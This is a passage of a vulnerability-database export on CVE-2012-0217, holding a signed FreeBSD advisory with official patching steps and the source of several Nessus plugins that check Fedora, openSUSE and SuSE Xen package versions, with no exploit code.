References\r\n\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0217\r\n\r\nThe latest revision of this advisory is available at\r\nhttp://security.FreeBSD.org/advisories/FreeBSD-SA-12:04.sysret.asc\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 (FreeBSD)\r\n\r\niEYEARECAAYFAk/XQGgACgkQFdaIBMps37KCsACdEvLcb0JhWKmVlvq5SuKzuW1Q\r\nfhsAnRVLFoGa2WGnRpfQrLYCjL9gs8Rd\r\n=RvZd\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2012-06-13T00:00:00", "published": "2012-06-13T00:00:00", "id": "SECURITYVULNS:DOC:28131", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28131", "title": "CVE-2012-0217", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:47", "bulletinFamily": "software", "cvelist": ["CVE-2012-0217"], "description": "Privilege escalation on susret on some CPUs.", "edition": 1, "modified": "2012-06-25T00:00:00", "published": "2012-06-25T00:00:00", "id": "SECURITYVULNS:VULN:12411", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12411", "title": "FreeBSD kernel privilege escalation", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:45", "bulletinFamily": "software", "cvelist": ["CVE-2012-0217"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n=============================================================================\r\nFreeBSD-SA-12:04.sysret Security Advisory\r\n The FreeBSD Project\r\n\r\nTopic: Privilege escalation when returning from kernel\r\n\r\nCategory: core\r\nModule: sys_amd64\r\nAnnounced: 2012-06-12\r\nCredits: Rafal Wojtczuk, John Baldwin\r\nAffects: All supported versions of FreeBSD\r\nCorrected: 2012-06-12 12:10:10 UTC (RELENG_7, 7.4-STABLE)\r\n 2012-06-12 12:10:10 UTC (RELENG_7_4, 7.4-RELEASE-p9)\r\n 2012-06-12 12:10:10 UTC (RELENG_8, 8.3-STABLE)\r\n 2012-06-12 
12:10:10 UTC (RELENG_8_3, 8.3-RELEASE-p3)\r\n 2012-06-12 12:10:10 UTC (RELENG_8_2, 8.2-RELEASE-p9)\r\n 2012-06-18 21:00:54 UTC (RELENG_8_1, 8.1-RELEASE-p12)\r\n 2012-06-12 12:10:10 UTC (RELENG_9, 9.0-STABLE)\r\n 2012-06-12 12:10:10 UTC (RELENG_9_0, 9.0-RELEASE-p3)\r\nCVE Name: CVE-2012-0217\r\n\r\nFor general information regarding FreeBSD Security Advisories,\r\nincluding descriptions of the fields above, security branches, and the\r\nfollowing sections, please visit <URL:http://security.FreeBSD.org/>.\r\n\r\n0. Revision History\r\n\r\nv1.0 2012-06-12 Initial release.\r\nv1.1 2012-06-19 Corrected patch FreeBSD 8.1.\r\n\r\nI. Background\r\n\r\nThe FreeBSD operating system implements a rings model of security, where\r\nprivileged operations are done in the kernel, and most applications\r\nrequest access to these operations by making a system call, which puts\r\nthe CPU into the required privilege level and passes control to the\r\nkernel.\r\n\r\nII. Problem Description\r\n\r\nFreeBSD/amd64 runs on CPUs from different vendors. Due to varying\r\nbehaviour of CPUs in 64 bit mode a sanity check of the kernel may be\r\ninsufficient when returning from a system call.\r\n\r\nIII. Impact\r\n\r\nSuccessful exploitation of the problem can lead to local kernel privilege\r\nescalation, kernel data corruption and/or crash.\r\n\r\nTo exploit this vulnerability, an attacker must be able to run code with user\r\nprivileges on the target system.\r\n\r\nIV. Workaround\r\n\r\nNo workaround is available.\r\n\r\nHowever FreeBSD/amd64 running on AMD CPUs is not vulnerable to this\r\nparticular problem.\r\n\r\nSystems with 64 bit capable CPUs, but running the 32 bit FreeBSD/i386\r\nkernel are not vulnerable, nor are systems running on different\r\nprocessor architectures.\r\n\r\nV. 
Solution\r\n\r\nPerform one of the following:\r\n\r\n1) Upgrade your vulnerable system to 7-STABLE, 8-STABLE, or 9-STABLE,\r\nor to the RELENG_7_4, RELENG_8_3, RELENG_8_2, RELENG_8_1, or RELENG_9_0\r\nsecurity branch dated after the correction date.\r\n\r\n2) To update your vulnerable system via a source code patch:\r\n\r\nThe following patches have been verified to apply to FreeBSD 7.4,\r\n8.3, 8.2, 8.1 and 9.0 systems.\r\n\r\na) Download the relevant patch from the location below, and verify the\r\ndetached PGP signature using your PGP utility.\r\n\r\n[7.4, 8.3, 8.2, 9.0]\r\n# fetch http://security.FreeBSD.org/patches/SA-12:04/sysret.patch\r\n# fetch http://security.FreeBSD.org/patches/SA-12:04/sysret.patch.asc\r\n\r\n[8.1]\r\n# fetch http://security.FreeBSD.org/patches/SA-12:04/sysret-81.patch\r\n# fetch http://security.FreeBSD.org/patches/SA-12:04/sysret-81.patch.asc\r\n\r\n[8.1 if original sysret.patch has been applied]\r\n# fetch http://security.FreeBSD.org/patches/SA-12:04/sysret-81-correction.patch\r\n# fetch http://security.FreeBSD.org/patches/SA-12:04/sysret-81-correction.patch.asc\r\n\r\nb) Apply the patch.\r\n\r\n# cd /usr/src\r\n# patch < /path/to/patch\r\n\r\nc) Recompile your kernel as described in\r\n<URL:http://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the\r\nsystem.\r\n\r\n3) To update your vulnerable system via a binary patch:\r\n\r\nSystems running 7.4-RELEASE, 8.3-RELEASE, 8.2-RELEASE, 8.1-RELEASE,\r\nor 9.0-RELEASE on the i386 or amd64 platforms can be updated via the\r\nfreebsd-update(8) utility:\r\n\r\n# freebsd-update fetch\r\n# freebsd-update install\r\n\r\nVI. 
Correction details\r\n\r\nThe following list contains the revision numbers of each file that was\r\ncorrected in FreeBSD.\r\n\r\nCVS:\r\n\r\nBranch Revision\r\n Path\r\n- -------------------------------------------------------------------------\r\nRELENG_7\r\n src/sys/amd64/amd64/trap.c 1.319.2.14\r\nRELENG_7_4\r\n src/UPDATING 1.507.2.36.2.11\r\n src/sys/conf/newvers.sh 1.72.2.18.2.14\r\n src/sys/amd64/amd64/trap.c 1.319.2.12.2.2\r\nRELENG_8\r\n src/sys/amd64/amd64/trap.c 1.332.2.24\r\nRELENG_8_3\r\n src/UPDATING 1.632.2.26.2.5\r\n src/sys/conf/newvers.sh 1.83.2.15.2.7\r\n src/sys/amd64/amd64/trap.c 1.332.2.21.2.2\r\nRELENG_8_2\r\n src/UPDATING 1.632.2.19.2.11\r\n src/sys/conf/newvers.sh 1.83.2.12.2.14\r\n src/sys/amd64/amd64/trap.c 1.332.2.14.2.2\r\nRELENG_8_1\r\n src/UPDATING 1.632.2.14.2.15\r\n src/sys/conf/newvers.sh 1.83.2.10.2.16\r\n src/sys/amd64/amd64/trap.c 1.332.2.10.2.3\r\nRELENG_9\r\n src/sys/amd64/amd64/trap.c 1.357.2.9\r\nRELENG_9_0\r\n src/UPDATING 1.702.2.4.2.5\r\n src/sys/conf/newvers.sh 1.95.2.4.2.7\r\n src/sys/amd64/amd64/trap.c 1.357.2.2.2.3\r\n- -------------------------------------------------------------------------\r\n\r\nSubversion:\r\n\r\nBranch/path Revision\r\n- -------------------------------------------------------------------------\r\nstable/7/ r236953\r\nreleng/7.4/ r236953\r\nstable/8/ r236953\r\nreleng/8.3/ r236953\r\nreleng/8.2/ r236953\r\nreleng/8.1/ r237242\r\nstable/9/ r236953\r\nreleng/9.0/ r236953\r\n- -------------------------------------------------------------------------\r\n\r\nVII. 
References\r\n\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0217\r\n\r\nThe latest revision of this advisory is available at\r\nhttp://security.FreeBSD.org/advisories/FreeBSD-SA-12:04.sysret.asc\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9\r\n\r\niEYEARECAAYFAk/gjHQACgkQFdaIBMps37KutQCgkcp+lqFuJ3/fQKUemn80suW5\r\nu/wAn2VLxY5LoUPNsN2eUHYB4GMz0AHl\r\n=tQOk\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2012-06-25T00:00:00", "published": "2012-06-25T00:00:00", "id": "SECURITYVULNS:DOC:28207", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28207", "title": "FreeBSD Security Advisory FreeBSD-SA-12:04.sysret [REVISED]", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-12T10:10:43", "description": "64-bit PV guest privilege escalation vulnerability [CVE-2012-0217],\nguest denial of service on syscall/sysenter exception generation\n[CVE-2012-0218], PV guest host Denial of Service [CVE-2012-2934]\nEnable xenconsoled by default under systemd, adjust xend.service\nsystemd file to avoid selinux problems\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 11, "published": "2012-06-26T00:00:00", "title": "Fedora 17 : xen-4.1.2-20.fc17 (2012-9386)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "modified": "2012-06-26T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:17", "p-cpe:/a:fedoraproject:fedora:xen"], "id": "FEDORA_2012-9386.NASL", "href": "https://www.tenable.com/plugins/nessus/59692", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-9386.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59692);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_xref(name:\"FEDORA\", value:\"2012-9386\");\n\n script_name(english:\"Fedora 17 : xen-4.1.2-20.fc17 (2012-9386)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"64-bit PV guest privilege escalation vulnerability [CVE-2012-0217],\nguest denial of service on syscall/sysenter exception generation\n[CVE-2012-0218], PV guest host Denial of Service [CVE-2012-2934]\nEnable xenconsoled by default under systemd, adjust xend.service\nsystemd file to avoid selinux problems\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=829732\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-June/082824.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c5a16806\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected xen package.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"xen-4.1.2-20.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-05T11:12:03", "description": "This update of XEN fixed multiple security flaws that could be\nexploited by local attackers to cause a Denial of Service or\npotentially escalate privileges. 
Additionally, several other upstream\nchanges were backported.", "edition": 19, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : xen (openSUSE-SU-2012:0886-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:xen-doc-html", "p-cpe:/a:novell:opensuse:xen-devel", "cpe:/o:novell:opensuse:12.1", "p-cpe:/a:novell:opensuse:xen-kmp-desktop", "p-cpe:/a:novell:opensuse:xen-kmp-pae", "p-cpe:/a:novell:opensuse:xen", "p-cpe:/a:novell:opensuse:xen-tools-debuginfo", "p-cpe:/a:novell:opensuse:xen-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:xen-doc-pdf", "p-cpe:/a:novell:opensuse:xen-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:xen-libs", "p-cpe:/a:novell:opensuse:xen-tools-domU-debuginfo", "p-cpe:/a:novell:opensuse:xen-libs-debuginfo", "p-cpe:/a:novell:opensuse:xen-libs-32bit", "p-cpe:/a:novell:opensuse:xen-debugsource", "p-cpe:/a:novell:opensuse:xen-tools", "p-cpe:/a:novell:opensuse:xen-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:xen-tools-domU", "p-cpe:/a:novell:opensuse:xen-kmp-default", "p-cpe:/a:novell:opensuse:xen-libs-debuginfo-32bit"], "id": "OPENSUSE-2012-403.NASL", "href": "https://www.tenable.com/plugins/nessus/74682", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2012-403.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(74682);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\");\n\n script_name(english:\"openSUSE Security Update : xen (openSUSE-SU-2012:0886-1)\");\n script_summary(english:\"Check for the openSUSE-2012-403 patch\");\n\n 
script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of XEN fixed multiple security flaws that could be\nexploited by local attackers to cause a Denial of Service or\npotentially escalate privileges. Additionally, several other upstream\nchanges were backported.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=757537\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=757970\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=764077\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2012-07/msg00035.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected xen packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'FreeBSD Intel SYSRET Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-debugsource\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-doc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-doc-pdf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools-domU\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools-domU-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-debugsource-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-devel-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-kmp-default-4.1.2_17_k3.1.10_1.16-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-kmp-default-debuginfo-4.1.2_17_k3.1.10_1.16-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-kmp-desktop-4.1.2_17_k3.1.10_1.16-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-kmp-desktop-debuginfo-4.1.2_17_k3.1.10_1.16-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-kmp-pae-4.1.2_17_k3.1.10_1.16-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", 
reference:\"xen-kmp-pae-debuginfo-4.1.2_17_k3.1.10_1.16-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-libs-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-libs-debuginfo-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-tools-domU-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-tools-domU-debuginfo-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"xen-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"xen-doc-html-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"xen-doc-pdf-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"xen-libs-32bit-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"xen-libs-debuginfo-32bit-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"xen-tools-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"xen-tools-debuginfo-4.1.2_17-1.10.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T19:09:23", "description": "Three security issues were found in XEN.\n\nTwo security issues are fixed by this update :\n\n - Due to incorrect fault handling in the XEN hypervisor it\n was possible for a XEN guest domain administrator to\n execute code in the XEN host environment.\n (CVE-2012-0217)\n\n - Also a guest user could crash the guest XEN kernel due\n to a protection fault bounce. 
(CVE-2012-0218)\n\nThe third fix is changing the Xen behaviour on certain hardware :\n\n - The issue is a denial of service issue on older pre-SVM\n AMD CPUs (AMD Erratum 121). (CVE-2012-2934)\n\n AMD Erratum #121 is described in 'Revision Guide for AMD\n Athlon 64 and AMD Opteron Processors':\n http://support.amd.com/us/Processor_TechDocs/25759.pdf\n\n The following 130nm and 90nm (DDR1-only) AMD processors\n are subject to this erratum :\n\n - First-generation AMD-Opteron(tm) single and dual core\n processors in either 939 or 940 packages :\n\n - AMD Opteron(tm) 100-Series Processors\n\n - AMD Opteron(tm) 200-Series Processors\n\n - AMD Opteron(tm) 800-Series Processors\n\n - AMD Athlon(tm) processors in either 754, 939 or 940\n packages\n\n - AMD Sempron(tm) processor in either 754 or 939 packages\n\n - AMD Turion(tm) Mobile Technology in 754 package\n\n This issue does not affect Intel processors.\n\n The impact of this flaw is that a malicious PV guest\n user can halt the host system.\n\n As this is a hardware flaw, it is not fixable except by\n upgrading your hardware to a newer revision, or not\n allowing untrusted 64-bit guest systems.\n\n The patch changes the behaviour of the host system\n booting, which makes it unable to create guest machines\n until a specific boot option is set.\n\n There is a new XEN boot option 'allow_unsafe' for GRUB\n which allows the host to start guests again. Setting it does\n not remove the erratum: on affected CPUs the host stays\n exposed to this denial of service from untrusted 64-bit PV\n guests.\n\n The option is added to /boot/grub/menu.lst in the line looking\n like this :\n\n kernel /boot/xen.gz .... allow_unsafe\n\n Note: .... 
in this example represents the existing boot\n options for the host.", "edition": 18, "published": "2012-06-13T00:00:00", "title": "SuSE 10 Security Update : Xen (ZYPP Patch Number 8180)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "modified": "2012-06-13T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_XEN-201206-8180.NASL", "href": "https://www.tenable.com/plugins/nessus/59469", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(59469);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\");\n\n script_name(english:\"SuSE 10 Security Update : Xen (ZYPP Patch Number 8180)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Three security issues were found in XEN.\n\nTwo security issues are fixed by this update :\n\n - Due to incorrect fault handling in the XEN hypervisor it\n was possible for a XEN guest domain administrator to\n execute code in the XEN host environment.\n (CVE-2012-0217)\n\n - Also a guest user could crash the guest XEN kernel due\n to a protection fault bounce. (CVE-2012-0218)\n\nThe third fix is changing the Xen behaviour on certain hardware :\n\n - The issue is a denial of service issue on older pre-SVM\n AMD CPUs (AMD Erratum 121). 
(CVE-2012-2934)\n\n AMD Erratum #121 is described in 'Revision Guide for AMD\n Athlon 64 and AMD Opteron Processors':\n http://support.amd.com/us/Processor_TechDocs/25759.pdf\n\n The following 130nm and 90nm (DDR1-only) AMD processors\n are subject to this erratum :\n\no\n\nFirst-generation AMD-Opteron(tm) single and dual core\nprocessors in either 939 or 940 packages :\n\n - AMD Opteron(tm) 100-Series Processors\n\n - AMD Opteron(tm) 200-Series Processors\n\n - AMD Opteron(tm) 800-Series Processors\n\n - AMD Athlon(tm) processors in either 754, 939 or 940\n packages\n\n - AMD Sempron(tm) processor in either 754 or 939 packages\n\n - AMD Turion(tm) Mobile Technology in 754 package This\n issue does not effect Intel processors.\n\n The impact of this flaw is that a malicious PV guest\n user can halt the host system.\n\n As this is a hardware flaw, it is not fixable except by\n upgrading your hardware to a newer revision, or not\n allowing untrusted 64bit guestsystems.\n\n The patch changes the behaviour of the host system\n booting, which makes it unable to create guest machines\n until a specific boot option is set.\n\n There is a new XEN boot option 'allow_unsafe' for GRUB\n which allows the host to start guests again.\n\n This is added to /boot/grub/menu.lst in the line looking\n like this :\n\n kernel /boot/xen.gz .... allow_unsafe\n\n Note: .... 
in this example represents the existing boot\n options for the host.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-0217.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-0218.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-2934.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 8180.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", 